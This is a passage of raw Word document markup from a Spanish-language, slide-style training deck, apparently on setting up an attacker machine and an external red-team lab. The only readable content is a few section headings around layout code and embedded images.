              <v:group w14:anchorId="3E935440" id="Group 328" o:spid="_x0000_s1161" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15796736;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 329" o:spid="_x0000_s1162" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 330" o:spid="_x0000_s1163" type="#_x0000_t202" style="position:absolute;width:121920;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6F152472" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="3971"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>2.2 Configuraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n de la m</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>á</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>quina atacante</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8A762" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CA570F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227AA90D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B41FF4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="35"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573AB160" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="6616" w:hanging="812"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMOSTRACIÓN de configuración de red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B392A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId151"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="79"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610D13C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15797760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56DCC57D" wp14:editId="6E912460">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1325880"/>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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="332" name="Graphic 332"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="333" name="Textbox 333"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="17C58D88" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="3858"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>2.3 Configuraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n externa del Laboratorio del Equipo Rojo</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="56DCC57D" id="Group 331" o:spid="_x0000_s1164" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15797760;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 332" o:spid="_x0000_s1165" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 333" o:spid="_x0000_s1166" type="#_x0000_t202" style="position:absolute;width:121920;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17C58D88" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="3858"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>2.3 Configuraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n externa del Laboratorio del Equipo Rojo</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC018C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4094434F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E6F350" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4110EDB9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417CABBF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D59A8C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B96D6BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B8B706" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D523B05" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AF007C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B294CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78034AB2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="206"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="512D5A27" wp14:editId="53E87DEE">
                <wp:extent cx="11916410" cy="4258945"/>
                <wp:effectExtent l="0" t="0" r="0" b="8254"/>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16410" cy="4258945"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11916410" cy="4258945"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="335" name="Image 335"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId152" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="11916232" cy="4258326"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="336" name="Image 336"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId153" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164630" y="164702"/>
                            <a:ext cx="11600688" cy="3942587"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1A522208" id="Group 334" o:spid="_x0000_s1026" style="width:938.3pt;height:335.35pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="119164,425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I+Jf+Qo3+6K66uR8S/wDIUb/dFdeF/iHPX+AyqKKK9U88KKKK&#10;ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA&#10;KKKKACiiigAooooAKKKKACiiigArvrb/AI9ov9wfyrga762/49ov9wfyrgxeyOvD7slooorzjt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R8S/8hRv90V11cj4l/5Cjf7o&#10;rrwv8Q56/wABlUUUV6p54UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFF&#10;FFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABXfW3/HtF/uD+VcDXfW3/AB7R&#10;f7g/lXBi9kdeH3ZLRRRXnH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j4l/wCQo3+6K66uR8S/8hRv90V14X+Ic9f4DKooor1TzwooooAKKKKACiiigAooooAKKKKACiii&#10;gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA&#10;Cu+tv+PaL/cH8q4Gu+tv+PaL/cH8q4MXsjrw+7JaKKK847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">
                <v:shape id="Image 335" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:119162;height:4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">
                  <v:imagedata r:id="rId154" o:title=""/>
                </v:shape>
                <v:shape id="Image 336" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1647;width:116007;height:3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">
                  <v:imagedata r:id="rId155" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="315580C8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383A44B6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15798272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="193405A8" wp14:editId="7BC9AA9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1325880"/>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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="338" name="Graphic 338"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="339" name="Textbox 339"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1881A4B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="3584"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>2.3.1 Descripci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n general de la configuraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n del laboratorio externo</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="193405A8" id="Group 337" o:spid="_x0000_s1167" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15798272;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 338" o:spid="_x0000_s1168" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 339" o:spid="_x0000_s1169" type="#_x0000_t202" style="position:absolute;width:121920;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1881A4B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="3584"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>2.3.1 Descripci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n general de la configuraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n del laboratorio externo</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
